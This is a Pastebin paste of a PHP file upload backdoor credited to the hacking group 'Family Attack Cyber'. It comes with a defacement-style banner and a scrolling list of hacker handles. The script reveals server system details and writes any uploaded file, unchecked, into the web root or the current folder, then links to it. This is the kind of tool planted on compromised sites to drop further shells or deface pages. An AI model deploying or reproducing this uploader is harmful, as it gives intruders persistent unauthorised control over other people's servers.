Advertisement
Guest User

Uploader by n43nr00 V.1

a guest
Apr 25th, 2019
149
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.46 KB | None | 0 0
  1. <!DOCTYPE HTML>
  2. <!--
  3.  
  4. Dilarang keras me-recode codingan orang lain tanpa seizin pemiliknya.
  5. Created by n43nr00 || Family Attack Cyber
  6. -->
  7. <html>
  8. <head>
  9. <link href="https://fonts.googleapis.com/css?family=Share+Tech+Mono" rel="stylesheet">
  10. <link href="https://fonts.googleapis.com/css?family=Dosis|Sedgwick+Ave" rel="stylesheet">
  11. <title>-nr00 Uploader-</title>
  12. <style type="text/css">
  13. html {
  14.     margin: 20px auto;
  15.     background: #000000;
  16.     color: red;
  17.     text-align: center;
  18. }
  19. pre {
  20. display: block;
  21. font-family: Sedgwick Ave;
  22. white-space: pre;
  23. margin: 1em 0;
  24. }
  25. header {
  26.     color: red;
  27.     font-family: courier;
  28.     margin: 10px auto;
  29. }
  30. {
  31.     width: 250px;
  32.     height: 25px;
  33.     color: red;
  34.     background: transparent;
  35.     border: 1px dotted red;
  36.     margin-left: 20px;
  37.     text-align: center;
  38. }
  39. </style>
  40. </head>
  41. <center>
  42. <header>
  43.     <pre>
  44. - n43nr00 Uploader | Family Attack Cyber -
  45. <img class="_4on7 _3mk2 img" src="https://scontent-sin6-1.xx.fbcdn.net/v/t1.0-9/35114659_1823813567926138_1113481124870356992_o.jpg?_nc_cat=101&amp;_nc_ht=scontent-sin6-1.xx&amp;oh=1271dfe585c0e9d23eb989c7f1832dba&amp;oe=5D362ACA" alt="" style="height: 330.46px; left: 0px; top: -18.243px; width: 820px;">
  46.     </pre>
  47. <?php
  48. echo "<b>".php_uname()."</b><br>";
  49. echo "<form method='post' enctype='multipart/form-data'>
  50.       <input type='file' name='uploader'>
  51.       <input type='submit' name='upload' value='upload'>
  52.       </form>";
  53. $root = $_SERVER['DOCUMENT_ROOT'];
  54. $files = $_FILES['uploader']['name'];
  55. $dest = $root.'/'.$files;
  56. if(isset($_POST['upload'])) {
  57.     if(is_writable($root)) {
  58.         if(@copy($_FILES['uploader']['tmp_name'], $dest)) {
  59.             $web = "http://".$_SERVER['HTTP_HOST']."/";
  60.             echo "Sukses Upload Homeroot -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
  61.         } else {
  62.             echo "Gagal Upload Homeroot >:(";
  63.         }
  64.     } else {
  65.         if(@copy($_FILES['uploader']['tmp_name'], $files)) {
  66.             echo "Upload Berhasil!! <b>$files</b> di folder ini";
  67.         } else {
  68.             echo "Upload Gagal!!";
  69.         }
  70.     }
  71. }
  72. ?>
  73. <br><br>
  74. <marquee scrollamount="5" width="630" height="20" behavior="alternate"><font color="red" face="Share Tech Mono">RadicalHaxor - Syuhada404 - GU3LT03M - SinonX - ./B4Z1R007 - anon99husein - ./JembutMawot - ZeroDieXploit - Bl4cKB3K4SI - HunterHost- FRU_403 - ./Mr.Wolf404 - UseYourBrain - MR.S1NS_Y - ./C3W3KBerB4T4n9 - <font color="white">n43nr00</font></marquee>
  75. <br><br><br><br><br><br>
  76. <font size="2px"face="Share Tech Mono" color="red">@copyright - n43nr00 | Family Attack Cyber
  77. </center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement